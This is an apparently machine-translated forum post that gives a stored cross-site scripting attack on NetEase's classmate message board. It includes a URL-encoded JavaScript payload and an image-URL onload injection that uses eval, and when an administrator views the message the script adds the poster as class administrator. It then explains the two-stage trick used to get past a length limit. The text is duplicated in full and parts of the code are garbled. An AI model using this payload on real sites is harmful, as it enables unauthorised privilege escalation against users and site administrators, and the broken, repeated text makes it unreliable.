1. Method:
The NetEase classmate recording and message function exists across websites. Here is a way to use it to add yourself as a class administrator.
Fill in the message box:
+++try%20%7B%0D%0A%09var%20as%20%3D%%28%22a%22%29%3B%0D%0A%09var%20frm%20%3D%%28%22iframe%22%29%5B0%5D%3B%0D%0A%%20%3D%20function%28%29%20%7B%0D%0A%09%09var%20oFrm%20%3D%%28%22iframe%22%29%5B0%5D%3B%0D%0A%09%%20%3D%20%22%22%3B%0D%0A%09%09var%20oDoc%20%3D%%3B%0D%0A%09%%5B%22who%22%5D%5B1%%20%3D%20true%3B%0D%0A%09%%20%3D%20%22backaction/%3Ff%3D1%22%3B%0D%0A%09%%28%29%3B%0D%0A%09%7D%0D%0A%%20%3D%20as%5B34%%3B%0D%0A%7D%20catch%20%28e%29%20%7B%0D%0A%09alert%28e%29%3B%0D%0A%7D---
Fill in the input box of the sticker url in the message:
http://alumniimg./new/images/classhome_logo.gif" onload="var t=;var s=('+++')+3;var e=('---');eval(unescape((s,e)));">
When the administrator observes the class message, he will add me as an administrator.
2. Principle:
The part of the code between the message++ and --- filled in the message box is decoded as follows:
try {
var as = ("a");
var frm = ("iframe")[0];
= function() {
var oFrm = ("iframe")[0];
= "";
var oDoc = ;
["who"][1].checked = true;
= "backaction/?f=1";
();
}
= as[34].href;
} catch (e) {
alert(e);
}
The vulnerability is that the input box of the map url does not filter the URL. I'll post a picture here and add an onload event, as long as the picture is
The URL is valid, and the normal image loading will trigger the event. Execute the code in my onload, and the code in the onload searches.
The code in my message is decoded and then executed. Because the length of the image url is limited, I did this once
Jump and divide what I want to do into two steps.
3. Finally:
Why do you want to post this thing that has no technical content? It's mainly because you think it's funy. You don't think this utilization process or overflow
Jumping to execute shellcode has the same meaning. Because there is a length limit, we need to divide shellcode into several parts.
The first part jumps to the second part to break through the length limit, and the principles of all vulnerabilities are similar in themselves.
Cross-site utilization can also be very interesting, such as "utilizing existing HTML and JS contexts, self-hiding, script deformation,
Break through the length limit, cross-site loophole worms, etc., throw a brick to wait for everyone's jade.
The NetEase classmate recording and message function exists across websites. Here is a way to use it to add yourself as a class administrator.
Fill in the message box:
+++try%20%7B%0D%0A%09var%20as%20%3D%%28%22a%22%29%3B%0D%0A%09var%20frm%20%3D%%28%22iframe%22%29%5B0%5D%3B%0D%0A%%20%3D%20function%28%29%20%7B%0D%0A%09%09var%20oFrm%20%3D%%28%22iframe%22%29%5B0%5D%3B%0D%0A%09%%20%3D%20%22%22%3B%0D%0A%09%09var%20oDoc%20%3D%%3B%0D%0A%09%%5B%22who%22%5D%5B1%%20%3D%20true%3B%0D%0A%09%%20%3D%20%22backaction/%3Ff%3D1%22%3B%0D%0A%09%%28%29%3B%0D%0A%09%7D%0D%0A%%20%3D%20as%5B34%%3B%0D%0A%7D%20catch%20%28e%29%20%7B%0D%0A%09alert%28e%29%3B%0D%0A%7D---
Fill in the input box of the sticker url in the message:
http://alumniimg./new/images/classhome_logo.gif" onload="var t=;var s=('+++')+3;var e=('---');eval(unescape((s,e)));">
When the administrator observes the class message, he will add me as an administrator.
2. Principle:
The part of the code between the message++ and --- filled in the message box is decoded as follows:
try {
var as = ("a");
var frm = ("iframe")[0];
= function() {
var oFrm = ("iframe")[0];
= "";
var oDoc = ;
["who"][1].checked = true;
= "backaction/?f=1";
();
}
= as[34].href;
} catch (e) {
alert(e);
}
The vulnerability is that the input box of the map url does not filter the URL. I'll post a picture here and add an onload event, as long as the picture is
The URL is valid, and the normal image loading will trigger the event. Execute the code in my onload, and the code in the onload searches.
The code in my message is decoded and then executed. Because the length of the image url is limited, I did this once
Jump and divide what I want to do into two steps.
3. Finally:
Why do you want to post this thing that has no technical content? It's mainly because you think it's funy. You don't think this utilization process or overflow
Jumping to execute shellcode has the same meaning. Because there is a length limit, we need to divide shellcode into several parts.
The first part jumps to the second part to break through the length limit, and the principles of all vulnerabilities are similar in themselves.
Cross-site utilization can also be very interesting, such as "utilizing existing HTML and JS contexts, self-hiding, script deformation,
Break through the length limit, cross-site loophole worms, etc., throw a brick to wait for everyone's jade.